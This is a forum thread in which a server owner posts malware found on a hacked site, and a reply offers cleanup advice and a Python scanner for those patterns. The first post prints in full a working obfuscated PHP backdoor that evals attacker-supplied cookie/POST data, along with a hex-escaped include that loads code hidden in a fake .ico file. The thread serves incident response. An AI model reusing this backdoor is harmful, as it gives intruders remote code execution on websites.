
Server hacked: I found these, please advise how to deep scan and detect any vulnerabilities

Posted: Thu Apr 19, 2018 9:55 am
by bgg
1. This is in an index.php file:

<?php
/*3bd6f*/

@include "\x2fhom\x65/kw\x73/we\x62/ka\x7aira\x6egaw\x69ldl\x69fes\x6fcie\x74y.i\x6e/pu\x62lic\x5fhtm\x6c/mo\x64ule\x73/bl\x6fg/f\x61vic\x6fn_2\x64393\x34.ic\x6f";

/*3bd6f*/

================
2. Another PHP file uploaded by the hacker:

<?php
$mslckg = '*#_g6r\'2om8s5k7nlfud4H-3pxeiyctvab0';$zmkcjwn = Array();$zmkcjwn[] = $mslckg[7].$mslckg[17].$mslckg[4].$mslckg[33].$mslckg[29].$mslckg[19].$mslckg[23].$mslckg[7].$mslckg[22].$mslckg[29].$mslckg[20].$mslckg[12].$mslckg[10].$mslckg[22].$mslckg[20].$mslckg[29].$mslckg[33].$mslckg[4].$mslckg[22].$mslckg[32].$mslckg[10].$mslckg[34].$mslckg[34].$mslckg[22].$mslckg[33].$mslckg[19].$mslckg[34].$mslckg[20].$mslckg[29].$mslckg[20].$mslckg[19].$mslckg[12].$mslckg[19].$mslckg[14].$mslckg[4].$mslckg[34];$zmkcjwn[] = $mslckg[21].$mslckg[0];$zmkcjwn[] = $mslckg[1];$zmkcjwn[] = $mslckg[29].$mslckg[8].$mslckg[18].$mslckg[15].$mslckg[30];$zmkcjwn[] = $mslckg[11].$mslckg[30].$mslckg[5].$mslckg[2].$mslckg[5].$mslckg[26].$mslckg[24].$mslckg[26].$mslckg[32].$mslckg[30];$zmkcjwn[] = $mslckg[26].$mslckg[25].$mslckg[24].$mslckg[16].$mslckg[8].$mslckg[19].$mslckg[26];$zmkcjwn[] = $mslckg[11].$mslckg[18].$mslckg[33].$mslckg[11].$mslckg[30].$mslckg[5];$zmkcjwn[] = $mslckg[32].$mslckg[5].$mslckg[5].$mslckg[32].$mslckg[28].$mslckg[2].$mslckg[9].$mslckg[26].$mslckg[5].$mslckg[3].$mslckg[26];$zmkcjwn[] = $mslckg[11].$mslckg[30].$mslckg[5].$mslckg[16].$mslckg[26].$mslckg[15];$zmkcjwn[] = $mslckg[24].$mslckg[32].$mslckg[29].$mslckg[13];foreach ($zmkcjwn[7]($_COOKIE, $_POST) as $cqkektp => $pkste){function qvfslq($zmkcjwn, $cqkektp, $rzuhf){return $zmkcjwn[6]($zmkcjwn[4]($cqkektp . $zmkcjwn[0], ($rzuhf / $zmkcjwn[8]($cqkektp)) + 1), 0, $rzuhf);}function vmgpz($zmkcjwn, $hzjjhan){return @$zmkcjwn[9]($zmkcjwn[1], $hzjjhan);}function kgusa($zmkcjwn, $hzjjhan){$ykasv = $zmkcjwn[3]($hzjjhan) % 3;if (!$ykasv) {eval($hzjjhan[1]($hzjjhan[2]));exit();}}$pkste = vmgpz($zmkcjwn, $pkste);kgusa($zmkcjwn, $zmkcjwn[5]($zmkcjwn[2], $pkste ^ qvfslq($zmkcjwn, $cqkektp, $zmkcjwn[8]($pkste))));}

===

3. This one looked like it tried to tamper with the /etc/passwd file:

# owner:group:mode:size(b):md5:atime(epoch):mtime(epoch):ctime(epoch):file(path)
southasiavi:southasiavi:644:58506:0de8a2d08fc4d676878ab80bcf29efb4:1511262032:1524020672:1524020672:/home/**/web/***.com/public_html/modules/field/theme/favicon_90a817.ico

FILE HIT LIST:
{HEX}php.base64.v23au.186 : /home/southasiavi/web/southasiaviews.com/public_html/modules/field/theme/favicon_90a817.ico => /usr/local/maldetect/quarantine/favicon_90a817.ico.273699283


===

4. FILE HIT LIST:
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /tmp/php5 => /usr/local/maldetect/quarantine/php5.11317678
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /tmp/systemd => /usr/local/maldetect/quarantine/systemd.1709516610
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /dev/shm/x => /usr/local/maldetect/quarantine/x.2515229452

===

Re: Server hacked: I found these, please advise how to deep scan and detect any vulnerabilities

Posted: Thu Apr 19, 2018 10:03 am
by mehargags
Well, the information you gave is not complete... Was only one site hacked, or did you find multiple sites hacked?
It looks more like an insecure site being targeted for malware injections.

You can:
1. Restore your site from a backup and then secure it.
2. Use Clamscan or Maldet to check your site files.

Ensure you have an open_basedir restriction in place for each site so that if one is compromised, the hacker cannot crawl through the other areas of the server.
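A quick way to triage a web root for the three patterns shown in this thread (the hex-escaped @include path, the index-concatenation dropper that eval()s cookie/POST data, and PHP code hidden in a .ico file) before or alongside a Clamscan/Maldet run. This is an added example, not code from the posters or from maldet; the regexes are heuristics of my own, and the file names and contents in SAMPLES are constructed fixtures, not the real files from the thread:

```python
import os
import re
import tempfile

# Heuristics modelled on the artefacts posted above. Added example; these are not
# maldet/ClamAV signatures and will need tuning on a real code base.
INDICATORS = {
    "hex_escaped_include": re.compile(r'@?include\s*"[^"]*(?:\\x[0-9a-fA-F]{2}[^"]*){4,}"'),
    "index_concat_obfuscation": re.compile(r'(?:\$\w+\[\d+\]\s*\.\s*){8,}'),
    "eval_on_request_data": re.compile(r'\$_(?:COOKIE|POST|GET|REQUEST)\b[\s\S]{0,2000}\beval\s*\('),
}

def decode_php_hex_escapes(literal: str) -> str:
    # Resolve PHP "\xNN" escapes so an obfuscated include path becomes readable.
    return re.sub(r'\\x([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), literal)

def scan_content(path: str, data: str) -> list:
    hits = [name for name, rx in INDICATORS.items() if rx.search(data)]
    if "<?php" in data and os.path.splitext(path)[1].lower() not in {".php", ".phtml", ".php5", ".inc"}:
        hits.append("php_code_in_non_php_file")  # e.g. the favicon_*.ico files in the thread
    return hits

def scan_tree(root: str) -> dict:
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_content(path, fh.read())
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings

# Constructed fixtures in the same shape as the thread's findings (not the real files).
SAMPLES = {
    "index.php": '<?php\n/*3bd6f*/\n@include "\\x2fvar\\x2fwww\\x2fsite\\x2fmodules\\x2ffavicon_1.ico";\n',
    "modules/favicon_1.ico": "<?php\n$a = 'abc';$b = $a[0].$a[1].$a[2].$a[0].$a[1].$a[2].$a[0].$a[1].$a[2];\n"
                             "foreach (array_merge($_COOKIE, $_POST) as $k => $v) { eval($v); }\n",
    "clean.php": "<?php\necho 'hello';\n",
}

def run_demo() -> dict:
    # Write the fixtures into a temporary web root, scan it, and return the findings.
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)
```

Point scan_tree at a site's public_html to get a list of files worth quarantining or comparing against a clean backup; decode_php_hex_escapes shows where an obfuscated include actually points.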

Re: Server hacked: I found these, please advise how to deep scan and detect any vulnerabilities

Posted: Sat Apr 21, 2018 12:24 pm
by bgg
Thanks a lot.

I restored all users from backup,

and did a further scan and fixed some more issues.